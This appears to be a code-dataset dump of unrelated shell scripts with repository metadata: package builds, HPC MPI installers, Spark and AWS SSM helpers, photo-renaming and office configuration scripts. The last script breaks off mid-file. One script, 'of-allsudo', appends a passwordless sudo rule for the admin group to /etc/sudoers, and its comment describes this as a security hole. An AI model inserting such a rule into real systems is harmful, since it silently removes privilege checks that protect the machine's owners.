/packages/sigspotter/PKGBUILD
|
UTF-8
| 766
| 2.609375
| 3
|
[] |
no_license
|
# This file is part of BlackArch Linux ( http://blackarch.org ).
# See COPYING for license details.
pkgname='sigspotter'
pkgver='1.0'
pkgrel=1
pkgdesc='A tool that search in your HD to find wich publishers has been signed binaries in your PC.'
url='http://www.security-projects.com/?SigSpotter'
groups=('blackarch' 'blackarch-windows' 'blackarch-misc')
license=('custom:unknown')
arch=('any')
makedepends=('unrar')
source=('http://sbdtools.googlecode.com/files/SigSpotter.rar')
noextract=('SigSpotter.rar')
sha1sums=('728b8cd12964a4e98c529c15ed516b866bf22c36')
prepare() {
cd "$srcdir"
unrar x SigSpotter
}
package() {
cd "$srcdir"
mkdir -p "$pkgdir/usr/share/windows/sigspotter"
rm SigSpotter.rar
cp -a * "$pkgdir/usr/share/windows/sigspotter"
}
| true
|
94b1c60873f5fa0d00fb2bbb89cab402811720bc
|
Shell
|
katka-juhasova/BP-data
|
/modules/dromozoa-ubench/lib/luarocks/rocks-5.3/dromozoa-ubench/1.5-1/bin/dromozoa-ubench
|
UTF-8
| 1,708
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh -e
# Copyright (C) 2015,2018 Tomoyuki Fujimori <moyu@dromozoa.com>
#
# This file is part of dromozoa-ubench.
#
# dromozoa-ubench is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dromozoa-ubench is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with dromozoa-ubench. If not, see <http://www.gnu.org/licenses/>.
dromozoa_basename() {
expr "X$1" : 'X.*\(/[^/][^/]*\)/*$' \
'|' "X$1" : '\(X//\)$' \
'|' "X$1" : '\(X/\)' \
'|' "X$1" | sed 's/^.//'
}
dromozoa_dirname() {
expr "X$1" : '\(X.*[^/]\)//*[^/][^/]*/*$' \
'|' "X$1" : '\(X//\)[^/]' \
'|' "X$1" : '\(X//\)$' \
'|' "X$1" : '\(X/\)' \
'|' X. | sed 's/^.//'
}
case X$1 in
X) exit 1;;
*) benchmarks_filename=$1; shift;;
esac
here=`dromozoa_dirname "$0"`
here=`(cd "$here" && pwd)`
dir=`dromozoa_basename "$benchmarks_filename"`
dir=`expr "X$dir" : 'Xubench\(_.*\)' '|' "X$dir" | sed -e 's/^.//'`
dir=`expr "X$dir" : '\(X.*\)\.' '|' "X$dir" | sed -e 's/^.//'`
mkdir -p "$dir"
rm -f "$dir/"results-*.dat
i=0
for lua in "$@"
do
i=`expr "$i" + 1`
results_filename=`printf '%s/results-%02d.dat' "$dir" "$i"`
echo 'require "dromozoa.ubench" (0.001, 1000, ...)' | "$lua" - "$benchmarks_filename" "$results_filename"
done
"$here/dromozoa-ubench-report" "$dir" "$dir"/results-*.dat
| true
|
f86e4a9ffe33a2c2e3f89796cdacf2246b5bf4c9
|
Shell
|
hyguo2/wPSN_classification
|
/scripts/towtgdv_all.sh
|
UTF-8
| 3,052
| 3.671875
| 4
|
[] |
no_license
|
##############################################################################################
# Purpose: Network to wt gdv
# Author: Khalique Newaz
#
# The parameter [input-dir] is the directory containg the folder that has all the networks
#
# The parameter [annotation-file] is the file containg the list of proteins whose GDVs are calculated
#
# The parameter [algorithm] has four values: 1, 2, 3, and 4, that correspond to the following.
# 1: edge vs. edge orbits COUNTS
# 2: edge vs. edge orbits WEIGHTS
# 3: node vs. edge orbits COUNTS
# 4: node vs. edge orbits WEIGHTS
#
#
##############################################################################################
#!/usr/bin/bash
if [ "$#" -lt 4 ]; then
echo Error: Wrong number of arguments
echo Usage: $0 [input-dir] [annotation-file] [algorithm] [output-dir] -m [atom: default 4]
echo Example: $0 [input-dir] [annotation-file] 2 [output-dir] -m 4
exit
fi
totalArgument=$#
matDirectory=$1
shift
annotationfile=$1
shift
algorithm=$1
shift
outputDir=$1
#outputDir="${outputDir,,}"
shift
if [ ! -d $matDirectory ]; then
echo Error: Directory $matDirectory not found
exit
fi
b=$(basename $annotationfile | cut -d"." -f1)
## default values ###############################
cutoff=4
##################################################
for((i=5;i<=totalArgument;i+=2)); do
type=$1
shift
if [ $i -eq $totalArgument ]; then
echo Error: Missing value for the parameter $type
exit
fi
val=$1
shift
if [ "$type" == "-m" ]; then
cutoff=$val
else
echo Error: Wrong type of parameter $type
exit
fi
done
if [ ! -d $outputDir ]; then
mkdir $outputDir
fi
if [ ! -d $outputDir/wt-GDVs-$cutoff-A ]; then
mkdir $outputDir/wt-GDVs-$cutoff-A
fi
outt=$matDirectory/
IFS=$'\n'
###########################################################################
# computing wt edge gdvs
# for every id in the annotation file
count=0
for line in `cat $annotationfile`;
do
filID=$(echo $line | cut -f2)
fileID=$(echo $filID | cut -d'.' -f 1)
#echo $fileID
goutt=$outputDir/wt-GDVs-$cutoff-A/$fileID
if [ ! -d $goutt ]; then
mkdir $goutt
fi
if [ $algorithm == 1 ];
then
./scripts/bin/ecount $outt/$fileID.gw $goutt/ew
elif [ $algorithm == 2 ];
then
./scripts/bin/ewcount $outt/$fileID.gw $goutt/ew
elif [ $algorithm == 3 ];
then
./scripts/bin/necount $outt/$fileID.gw $goutt/ew
elif [ $algorithm == 4 ];
then
./scripts/bin/nwcount $outt/$fileID.gw $goutt/ew
fi
count=$((count + 1))
echo computing weighted GDVs... $count
done
| true
|
970d52b1b693bc435792042a773c6f1c6df378d7
|
Shell
|
Azure/azhpc-images
|
/ubuntu/common/install_mpis.sh
|
UTF-8
| 5,342
| 2.953125
| 3
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
set -ex
# Parameters
HPCX_CHECKSUM=$1
# Load gcc
set CC=/usr/bin/gcc
set GCC=/usr/bin/gcc
INSTALL_PREFIX=/opt
# HPC-X v2.16
HPCX_VERSION="v2.16"
TARBALL="hpcx-${HPCX_VERSION}-gcc-mlnx_ofed-$DISTRIBUTION-cuda12-gdrcopy2-nccl2.18-x86_64.tbz"
HPCX_DOWNLOAD_URL=https://content.mellanox.com/hpc/hpc-x/${HPCX_VERSION}/${TARBALL}
HPCX_FOLDER=$(basename ${HPCX_DOWNLOAD_URL} .tbz)
$COMMON_DIR/download_and_verify.sh ${HPCX_DOWNLOAD_URL} ${HPCX_CHECKSUM}
tar -xvf ${TARBALL}
mv ${HPCX_FOLDER} ${INSTALL_PREFIX}
HPCX_PATH=${INSTALL_PREFIX}/${HPCX_FOLDER}
$COMMON_DIR/write_component_version.sh "HPCX" $HPCX_VERSION
# MVAPICH2 2.3.7-1
MV2_VERSION="2.3.7-1"
MV2_DOWNLOAD_URL=http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-${MV2_VERSION}.tar.gz
$COMMON_DIR/download_and_verify.sh $MV2_DOWNLOAD_URL "fdd971cf36d6476d007b5d63d19414546ca8a2937b66886f24a1d9ca154634e4"
tar -xvf mvapich2-${MV2_VERSION}.tar.gz
cd mvapich2-${MV2_VERSION}
# Error exclusive to Ubuntu 22.04
# configure: error: The Fortran compiler gfortran will not compile files that call
# the same routine with arguments of different types.
./configure $(if [[ ${DISTRIBUTION} == "ubuntu22.04" ]]; then echo "FFLAGS=-fallow-argument-mismatch"; fi) --prefix=${INSTALL_PREFIX}/mvapich2-${MV2_VERSION} --enable-g=none --enable-fast=yes && make -j$(nproc) && make install
cd ..
$COMMON_DIR/write_component_version.sh "MVAPICH2" ${MV2_VERSION}
# OpenMPI 4.1.5
OMPI_VERSION="4.1.5"
OMPI_DOWNLOAD_URL=https://download.open-mpi.org/release/open-mpi/v4.1/openmpi-${OMPI_VERSION}.tar.gz
$COMMON_DIR/download_and_verify.sh $OMPI_DOWNLOAD_URL "c018b127619d2a2a30c1931f316fc8a245926d0f5b4ebed4711f9695e7f70925"
tar -xvf openmpi-${OMPI_VERSION}.tar.gz
cd openmpi-${OMPI_VERSION}
./configure --prefix=${INSTALL_PREFIX}/openmpi-${OMPI_VERSION} --with-ucx=${UCX_PATH} --with-hcoll=${HCOLL_PATH} --enable-mpirun-prefix-by-default --with-platform=contrib/platform/mellanox/optimized && make -j$(nproc) && make install
cd ..
$COMMON_DIR/write_component_version.sh "OMPI" ${OMPI_VERSION}
# Intel MPI 2021 (Update 9)
IMPI_2021_VERSION="2021.9.0"
IMPI_2021_DOWNLOAD_URL=https://registrationcenter-download.intel.com/akdlm/IRC_NAS/718d6f8f-2546-4b36-b97b-bc58d5482ebf/l_mpi_oneapi_p_${IMPI_2021_VERSION}.43482_offline.sh
$COMMON_DIR/download_and_verify.sh $IMPI_2021_DOWNLOAD_URL "5c170cdf26901311408809ced28498b630a494428703685203ceef6e62735ef8"
bash l_mpi_oneapi_p_${IMPI_2021_VERSION}.43482_offline.sh -s -a -s --eula accept
mv ${INSTALL_PREFIX}/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/mpi ${INSTALL_PREFIX}/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/impi
$COMMON_DIR/write_component_version.sh "IMPI_2021" ${IMPI_2021_VERSION}
# Module Files
MODULE_FILES_DIRECTORY=/usr/share/modules/modulefiles/mpi
mkdir -p ${MODULE_FILES_DIRECTORY}
# HPC-X
cat << EOF >> ${MODULE_FILES_DIRECTORY}/hpcx-${HPCX_VERSION}
#%Module 1.0
#
# HPCx ${HPCX_VERSION}
#
conflict mpi
module load ${HPCX_PATH}/modulefiles/hpcx
EOF
# MVAPICH2
cat << EOF >> ${MODULE_FILES_DIRECTORY}/mvapich2-${MV2_VERSION}
#%Module 1.0
#
# MVAPICH2 ${MV2_VERSION}
#
conflict mpi
prepend-path PATH /opt/mvapich2-${MV2_VERSION}/bin
prepend-path LD_LIBRARY_PATH /opt/mvapich2-${MV2_VERSION}/lib
prepend-path MANPATH /opt/mvapich2-${MV2_VERSION}/share/man
setenv MPI_BIN /opt/mvapich2-${MV2_VERSION}/bin
setenv MPI_INCLUDE /opt/mvapich2-${MV2_VERSION}/include
setenv MPI_LIB /opt/mvapich2-${MV2_VERSION}/lib
setenv MPI_MAN /opt/mvapich2-${MV2_VERSION}/share/man
setenv MPI_HOME /opt/mvapich2-${MV2_VERSION}
EOF
# OpenMPI
cat << EOF >> ${MODULE_FILES_DIRECTORY}/openmpi-${OMPI_VERSION}
#%Module 1.0
#
# OpenMPI ${OMPI_VERSION}
#
conflict mpi
prepend-path PATH /opt/openmpi-${OMPI_VERSION}/bin
prepend-path LD_LIBRARY_PATH /opt/openmpi-${OMPI_VERSION}/lib
prepend-path MANPATH /opt/openmpi-${OMPI_VERSION}/share/man
setenv MPI_BIN /opt/openmpi-${OMPI_VERSION}/bin
setenv MPI_INCLUDE /opt/openmpi-${OMPI_VERSION}/include
setenv MPI_LIB /opt/openmpi-${OMPI_VERSION}/lib
setenv MPI_MAN /opt/openmpi-${OMPI_VERSION}/share/man
setenv MPI_HOME /opt/openmpi-${OMPI_VERSION}
EOF
# Intel 2021
cat << EOF >> ${MODULE_FILES_DIRECTORY}/impi_${IMPI_2021_VERSION}
#%Module 1.0
#
# Intel MPI ${IMPI_2021_VERSION}
#
conflict mpi
module load /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/impi
setenv MPI_BIN /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/bin
setenv MPI_INCLUDE /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/include
setenv MPI_LIB /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/lib
setenv MPI_MAN /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/man
setenv MPI_HOME /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}
EOF
# Softlinks
ln -s ${MODULE_FILES_DIRECTORY}/hpcx-${HPCX_VERSION} ${MODULE_FILES_DIRECTORY}/hpcx
ln -s ${MODULE_FILES_DIRECTORY}/mvapich2-${MV2_VERSION} ${MODULE_FILES_DIRECTORY}/mvapich2
ln -s ${MODULE_FILES_DIRECTORY}/openmpi-${OMPI_VERSION} ${MODULE_FILES_DIRECTORY}/openmpi
ln -s ${MODULE_FILES_DIRECTORY}/impi_${IMPI_2021_VERSION} ${MODULE_FILES_DIRECTORY}/impi-2021
| true
|
54b8e045c4d5aa756954017361eeb63a369eecee
|
Shell
|
RoyLeeChina/XgbWorkstation
|
/src/main/resources/cmd_example.sh
|
UTF-8
| 1,559
| 2.84375
| 3
|
[] |
no_license
|
#./bin/spark-submit \
# --class <main-class> \ # 应用程序主入口类
# --master <master-url> \ # 集群的 Master Url
# --deploy-mode <deploy-mode> \ # 部署模式
# --conf <key>=<value> \ # 可选配置
# ... # other options
# <application-jar> \ # Jar 包路径
# [application-arguments] #传递给主入口类的参数
# 在集群环境下,application-jar 必须能被集群中所有节点都能访问,
# 可以是 HDFS 上的路径;也可以是本地文件系统路径,
# 如果是本地文件系统路径,则要求集群中每一个机器节点上的相同路径都存在该 Jar 包。
# 本地模式提交应用
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master local[2] \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100 # 传给 SparkPi 的参数
# 以client模式提交到standalone集群
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master spark://hadoop001:7077 \
--executor-memory 2G \
--total-executor-cores 10 \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100
# 以cluster模式提交到standalone集群
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master spark://207.184.161.138:7077 \
--deploy-mode cluster \
--supervise \ # 配置此参数代表开启监督,如果主应用程序异常退出,则自动重启 Driver
--executor-memory 2G \
--total-executor-cores 10 \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100
| true
|
9b079807d46bbce04131af1849280fb69acbf653
|
Shell
|
ParkvilleGeek/MCRIBS
|
/bin/MCRIBParcStats
|
UTF-8
| 606
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$1" ]
then
echo "Usage: $0 <subject id>"
exit
fi
SUBJID=$1
HEMIS=$2
shift
shift
ATLASES=$@
export SUBJECTS_DIR=`pwd`/freesurfer
cd $SUBJECTS_DIR/$SUBJID
if [ "$HEMIS" == "both" ]
then
HEMIS="lh
rh"
fi
mkdir -p stats
# we can't use the etiv option since we dont have the talairach.xfm file
for CURHEMI in $HEMIS
do
for ATLAS in $ATLASES
do
cd $SUBJECTS_DIR/$SUBJID/surf
echo mris_anatomical_stats -th3 -mgz -cortex ../label/$CURHEMI.cortex.label -f stats/$CURHEMI.$ATLAS.stats -b -a label/$CURHEMI.$ATLAS.annot -c label/$CURHEMI.$ATLAS.ctab $SUBJID $CURHEMI
done
done
| true
|
cd99e1fe83060a3c3ba650f4df747c1b9baf5928
|
Shell
|
cmachadox/script-access-ssm
|
/acessos.sh
|
UTF-8
| 1,306
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
clear
echo 'Norte Virginia = us-east-1'
echo 'Oregon = us-west-2'
echo 'Frankfurt = eu-central-1'
read -p "Escolha a Região da Instancia ? " region
#read region
echo "Gerando lista de instancias gerenciaveis, aguarde... "
aws ssm describe-instance-information --region $region | grep InstanceId > instancias-ssm.txt
aws ec2 describe-instances --instance-ids --region $region --query "Reservations[*].Instances[*].{Instance:InstanceId,Name:Tags[?Key=='Name']|[0].Value}" --output=text > instancias-nomes.txt 2> /dev/null
rm -f instancias-gerenciaveis.txt
cat instancias-nomes.txt | while read instancia nome ; do grep $instancia instancias-ssm.txt > log_grep.txt 2>&1 && echo -e "${instancia} ${nome}" >> instancias-gerenciaveis.txt ; done
if [[ $(wc -l instancias-gerenciaveis.txt | cut -d\ -f1 2> /dev/null) -gt 0 ]]
then
echo "Ids encontrados no profile $profile"
cat -n instancias-gerenciaveis.txt
read -p "Escolha o ID: " id
selecionado=`sed "$id !d" instancias-gerenciaveis.txt | awk '{print $1}' # | sed 's/"//g;s/,//g'`
echo "O ID escolhido é: " $selecionado
aws ssm start-session --target $selecionado --region $region
else
echo Nenhuma instancia encontrada na regiao $region
fi
| true
|
197e0fd776bb9ab12019084872f8f9fd7275a969
|
Shell
|
jiho-dev/myutils
|
/pic_rename.sh
|
UTF-8
| 5,913
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# tool 사용 방법
# 1) virtualbox에 리눅스 설치하고, 공유 폴더를 설정 한다.
# 2) 리눅스에 exiftool을 설치 한다. sudo apt-get install exiftool
# 3) 공유 폴더 하위에 이미지 폴더 이 스크립트 복사
: '
# 예)
# [jjh@devme ~/img]$ tree
# ├── pic_rename.sh
# ├── tmp
# │ ├── 20150508_201552.jpg
# │ ├── DSC_1427.JPG
# │ ├── DSC_1428.JPG
# │ ├── DSC_1429.JPG
# │ ├── DSC_1430.JPG
# │ └── DSC_1441.JPG
'
#rm *.jpg -f
#rm *.JPG -f
#cp ./org/* .
#rm -f new/*
#exiftool '-filename<CreateDate' -d %y%m%d_%H%M%S%%-c.%%le -r -ext cr2 -ext mrw /media/ingest/test
#exiftool '-filename<CreateDate' -d %Y%m%d_%H%M%S%%-c.%%le -ext jpg .
#exiftool -v '-filename<CreateDate' -d %Y%m%d_%H%M%S%%+c.%%le -ext jpg .
#exiftool -v -ext jpg "-filename<${datetimeoriginal}${SubSecCreateDate}0.%e" -d %Y%m%d_%H%M%S .
#exiftool 20150513_194948.jpg -EXIF:SubSecTime
#exiftool -ext jpg -t -n -s2 -EXIF:SubSecTime ./DSC_3034_2.JPG
#exiftool -t -n -s2 -EXIF:SubSecTime ./1441061910693.jpg
#exiftool "-DateTimeOriginal-=0:0:0 1:0:0"
#exiftool "-filemodifydate<${datetimeoriginal;s/(\d{4}):00:00/$1:01:01/}"
#exiftool -AllDates+=1:30 -if '$make eq "Canon"' dir
#exiftool -modifydate+=3 a.jpg b.jpg
#######################
set_modify_time() {
local msg=$1
local f=$(echo "$msg" | awk 'NR==3' | awk '{print $3}')
local filename=${f//\'/} # remove ' mark in the string
if [ -e $filename ]; then
exiftool '-filemodifydate<DateTimeOriginal' -d %Y%m%d_%H%M%S $filename
else
echo "no file: $filename"
fi
}
apply_new_name() {
local filename=$1
local new_dir=$2
local author=$3
local sec=$4
local usec=$5
# 20160903_0520_hyojin_36_0000.jpg
# 20160903_0819_jiho_22_0000.jpg
msg="$(exiftool '-filename<CreateDate' -d %Y%m%d_%H%M_${author}_${sec}_${usec}%%+c.%%le -v -o ./$new_dir $filename)"
echo "$msg"
set_modify_time "$msg"
}
rename_pic() {
local cur_dir=$1
local new_dir="$1_new"
# 복사할 대상 디렉토리를 만든다.
if [ ! -d $new_dir ]; then
mkdir -p $new_dir
else
rm -f $new_dir/*
fi
local files=`cd $cur_dir; ls ./*.[jJ]* 2>/dev/null`
local fcnt=$(cd $cur_dir; ls ./*.[Jj]* 2>/dev/null | wc -l)
local i
local cnt=1
for i in $files
do
local f=$(basename $i)
local ofile="$cur_dir/$f"
local usec
local sec
sec=$(exiftool -t -s2 -EXIF:CreateDate -d %S $ofile)
usec=$(exiftool -t -n -s2 -EXIF:SubSecTime $ofile)
usec=$(expr $usec + 0)
usec=$(printf "%04d" $usec)
echo -n "== $cnt/$fcnt =="
# 새로운 파일 이름으로 복사 한다.
# 촬영 시간별로 정렬 되고, 중복 되면 촬영자 이름으로 정렬 됨
# yyyymmdd_hhmm_name_sec_usec.jpg
# 20150503_1434_jiho_11_0050
apply_new_name $ofile $new_dir $cur_dir $sec $usec
let "cnt ++"
done
}
# subdir에 있는 파일의 subsectime이 있는지 검사 한다.
# 없는 파일은 화면에 표시한다.
check_subsec() {
local cur_dir=$1
local files=`cd $cur_dir; ls ./*.[jJ]*`
local i
for i in $files
do
local f=${cur_dir}/$(basename $i)
local usec
usec=$(exiftool -t -n -s2 -EXIF:SubSecTime ${f})
if [ -z $usec ]; then
echo "No usec: ${f}"
fi
done
}
# subsec을 설정 한다.
set_subsectime() {
local cur_dir=$1
local files=`cd $cur_dir; ls ./*\(0\).[jJ]*`
local i
for i in $files
do
local f=$(basename $i)
local ofile="$cur_dir/$f"
exiftool -SubSecTime=001 -overwrite_original -v $ofile
done
}
find_next_usec() {
local cur_dir=$1
local file_prefix=$2
local myusec=0
while :
do
local usec_str=$(printf "%04d" $myusec)
local fname=${file_prefix}_${usec_str}.jpg
if [ -e ${cur_dir}/$fname ]; then
myusec=$(expr $myusec + 1)
else
echo ${myusec}
return
fi
done
}
rename_pic_without_usec() {
local cur_dir=$1
local new_dir="$1_new"
if [ ! -d $new_dir ]; then
mkdir -p $new_dir
else
rm -f $new_dir/*
fi
local files=`cd $cur_dir; ls ./*.[jJ]*`
local i
for i in $files
do
local usec
local f=$(basename $i)
local ofile="$cur_dir/$f"
local cdate=$(exiftool -t -s2 -EXIF:CreateDate -d %Y%m%d_%H%M%S $ofile)
usec=$(find_next_usec $new_dir $cdate)
usec=$(printf "%04d" $usec)
sec=$(exiftool -t -s2 -EXIF:CreateDate -d %S $ofile)
apply_new_name $ofile $new_dir $cur_dir $sec $usec
done
}
rename_create_date() {
local pic_dirs="$@"
# 각 디렉토리의 이미지를 새로운 디렉토리로 이름을 변경하여 복사한다.
# 이름은 촬영된 시간을 기준으로 한다.
for d in $pic_dirs
do
rename_pic $d
done
}
apply_author() {
local cur_dir=$1
local auth=$2
cd $cur_dir
local files=`ls ./*.[jJ]*`
local i
for i in $files
do
local filename=$(basename $i)
filename=${filename%%.*}
newname="${filename}_${auth}.jpg"
mv $i $newname
done
}
remove_word() {
local cur_dir=$1
local word=$2
cd $cur_dir
local files=`ls ./*.[jJ]*`
local i
for i in $files
do
local filename=$(basename $i)
orgfile=$filename
filename=${filename%%.*}
filename=${filename//$word/}
newname="${filename}.jpg"
if [ "$orgfile" != "$newname" ]; then
mv $i $newname
fi
done
}
# 이미지의 생성 시간, 마지막 편집 시간을 수정 한다.
adjust_modify_time()
{
local filename=$1
local adj_time="0:0:0 0:0:3"
exiftool "-FileModifyDate+=$adj_time" "-AllDates+=$adj_time" -overwrite_original $filename
}
########################################
#### main
#check_subsec tmp
# 김효진폰은 subsec이 없어서 강제로 설정 한다.
#set_subsectime hyojin
#rename_pic_without_usec hyojin
#apply_author "d7000_new" "d7000"
#remove_word "d7000_new" "_d700"
# 이미지 파일 이름을 촬영날짜로 변경하여 새로운 디렉토리에 복사한다.
#rename_create_date d7000 jiho jihyun
# 이미지 시간 조정
#adjust_modify_time "tmp_new/1.jpg"
rename_create_date d7000 jihyun
| true
|
871c23fa2ab1d39bdc31107aa14a55ffba4e25eb
|
Shell
|
jduda27/Unix_Shell-Scripts
|
/ScriptsW1/script7
|
UTF-8
| 116
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# copy the /usr/bin directory listing to a log file
today=$(date +%y%m%d)
ls -al /usr/bin > log.$today
| true
|
ed7cac6726f2ad91ea61ab03c7c3084d0f6e2b41
|
Shell
|
ucandoitrohit/Python3
|
/Bash-Shell/17-ps1-prompt-env-variable.sh
|
UTF-8
| 307
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bin
#PS1 is called primary prompt string and it the default interaction prompt
echo $PS1
#[\u@\h \W]\$
#u - user
#h - host
#W - working dirs
#$PS1="[\t ==> \u@\h \w]\$"
#make this setting permanent by adding export PS1="\u@\h \W>" to either
# .bash_profile
# or
# .bashrc
#
| true
|
364f4ba6e4c8fb7af4f4e8b88faf3d308e4c7f8f
|
Shell
|
jothebulb/openframe-linux
|
/overlay-debian-buster/usr/local/sbin/of-allsudo
|
UTF-8
| 264
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
# of-allsudo v1.00 (24th July 2019)
# Punches a nice big hole in your security for convenience!
if [ "$USER" != "root" ]; then
echo "You need to run this with superuser privileges."
exit 1
fi
echo "%admin ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
| true
|
c09b451737e1c4844c0c83fd496d6083d41fcc4f
|
Shell
|
lucaslm45/ETv4
|
/configsTaquigrafia/configuracao-taq.sh
|
UTF-8
| 5,105
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
USUARIO=$(who | head -1 | awk \{'print$1'\})
# Define os atalhos e modelos padrões do Libreoffice e o Deadbeef como aplicativo padrão para reproduzir .ogg para todos os próximos usuários criados:
mkdir -p /etc/skel/.config/libreoffice/4/user/template
sed -i '/^audio\/ogg=deadbeef.desktop$/a\audio\/x-vorbis+ogg=deadbeef.desktop' /etc/skel/.config/mimeapps.list
sed -i '/^audio\/ogg=deadbeef.desktop;$/a\audio\/x-vorbis+ogg=deadbeef.desktop;' /etc/skel/.config/mimeapps.list
cp ./Modelo_taq_etv4.ott /etc/skel/.config/libreoffice/4/user/template/
cp ./registrymodifications.xcu /etc/skel/.config/libreoffice/4/user/
# Define os atalhos e modelos padrões do Libreoffice e o Deadbeef como aplicativo padrão para reproduzir .ogg para o usuário que está logado:
if [ "$USUARIO" != "root" ] && [ "$USUARIO" != "suporte" ]; then
# Copia o arquivo contendo os atalhos do DeadBeef para o usuário logado:
mkdir -p "/home/$USUARIO/.config/deadbeef/"
cp ./taqconfig "/home/$USUARIO/.config/deadbeef/config"
mkdir -p "/home/$USUARIO/.config/libreoffice/4/user/template"
sed -i '/^audio\/ogg=deadbeef.desktop$/a\audio\/x-vorbis+ogg=deadbeef.desktop' "/home/$USUARIO/.config/mimeapps.list"
sed -i '/^audio\/ogg=deadbeef.desktop;$/a\audio\/x-vorbis+ogg=deadbeef.desktop;' "/home/$USUARIO/.config/mimeapps.list"
cp ./Modelo_taq_etv4.ott "/home/$USUARIO/.config/libreoffice/4/user/template/"
cp ./registrymodifications.xcu "/home/$USUARIO/.config/libreoffice/4/user/"
chown -R "$USUARIO:Domain Users" "/home/$USUARIO/.config/"
fi
# Atualiza atalho do SAT para Firefox e Chrome
if grep -q "\[BookmarksToolbar\]" /usr/lib/firefox-esr/distribution/distribution.ini; then
echo "item.12.title=SAT Visualizar
item.12.link=https://intranet.cmc.pr.gov.br/sat/visualizar.xhtml" >> /usr/lib/firefox-esr/distribution/distribution.ini
fi
echo '{
"checksum": "12183732edb9a4cc0c54818b2665e4ee",
"roots": {
"bookmark_bar": {
"children": [ {
"date_added": "13155996444000000",
"id": "6",
"meta_info": {
"last_visited_desktop": "13155997292262424"
},
"name": "Intranet",
"type": "url",
"url": "http://intranet.cmc.pr.gov.br/"
}, {
"date_added": "13155996444000000",
"id": "7",
"name": "Site CMC",
"type": "url",
"url": "https://www.cmc.pr.gov.br/"
}, {
"date_added": "13155996444000000",
"id": "8",
"name": "Correio",
"type": "url",
"url": "https://correio.cmc.pr.gov.br/"
}, {
"date_added": "13155996444000000",
"id": "9",
"name": "SPL II",
"type": "url",
"url": "https://intranet.cmc.pr.gov.br/spl/"
}, {
"date_added": "13155996444000000",
"id": "10",
"name": "SPA",
"type": "url",
"url": "https://intranet.cmc.pr.gov.br/spa/"
}, {
"date_added": "13155996445000000",
"id": "11",
"name": "SAAP",
"type": "url",
"url": "https://saap.cmc.pr.gov.br/"
}, {
"date_added": "13155996445000000",
"id": "12",
"name": "APL",
"type": "url",
"url": "http://intranet.cmc.pr.gov.br/apl/"
}, {
"date_added": "13155996445000000",
"id": "13",
"name": "Prefeitura de Curitiba",
"type": "url",
"url": "http://www.curitiba.pr.gov.br/"
}, {
"date_added": "13155996445000000",
"id": "14",
"name": "Suporte",
"type": "url",
"url": "http://suporte.cmc.pr.gov.br/"
}, {
"date_added": "13155996445000000",
"id": "15",
"name": "Nuvem",
"type": "url",
"url": "https://nuvem.cmc.pr.gov.br/"
}, {
"date_added": "13155996445000000",
"id": "16",
"name": "Chamados",
"type": "url",
"url": "https://chamados.cmc.pr.gov.br/"
}, {
"date_added": "13155996445000000",
"id": "17",
"name": "SAT Visualizar",
"type": "url",
"url": "https://intranet.cmc.pr.gov.br/sat/visualizar.xhtml"
} ],
"date_added": "13155997223920341",
"date_modified": "0",
"id": "1",
"name": "Barra de favoritos",
"type": "folder"
},
"other": {
"children": [ ],
"date_added": "13155997223920350",
"date_modified": "0",
"id": "2",
"name": "Outros favoritos",
"type": "folder"
},
"synced": {
"children": [ ],
"date_added": "13155997223920350",
"date_modified": "0",
"id": "3",
"name": "Favoritos de dispositivos móveis",
"type": "folder"
}
},
"version": 1
}' > /etc/skel/.config/google-chrome/Default/Bookmarks
| true
|
aae3749546ad34e413e15455e9f1d0d1135433cb
|
Shell
|
AndyA/dotfiles
|
/.bash.d/Darwin/completion
|
UTF-8
| 297
| 2.859375
| 3
|
[] |
no_license
|
config=()
for bc in /opt/local/etc/bash_completion; do
[ -f "$bc" ] && config=("${config[@]}" "$bc")
done
which brew >/dev/null 2>&1 && config=("${config[@]}" "$( brew --prefix )/etc/bash_completion")
for scr in ${config[@]}; do
[ -f "$scr" ] && . "$scr"
done
# vim:ts=2:sw=2:sts=2:et:ft=sh
| true
|
f89519fe4db4a2ce3a3dca1b4f6111c721aa4a14
|
Shell
|
pwcjr/xkb-dvorak-arabic
|
/install.sh
|
UTF-8
| 1,573
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This script adds the Arabic Dvorak layout to the ara XKB configuration
# file. Dry-run patches are attempted on both files before actually
# patching, and if successful the patches are applied.
#
#######################################################################
if [[ $EUID -ne 0 ]]; then
echo "This script requires root privileges" 1>&2
exit -1
fi
SYMBOL_FILE="/usr/share/X11/xkb/symbols/ara"
SYMBOL_PATCH="ara.patch"
EVDEV_FILE="/usr/share/X11/xkb/rules/evdev.xml"
EVDEV_PATCH="evdev.xml.patch"
# check that files exist
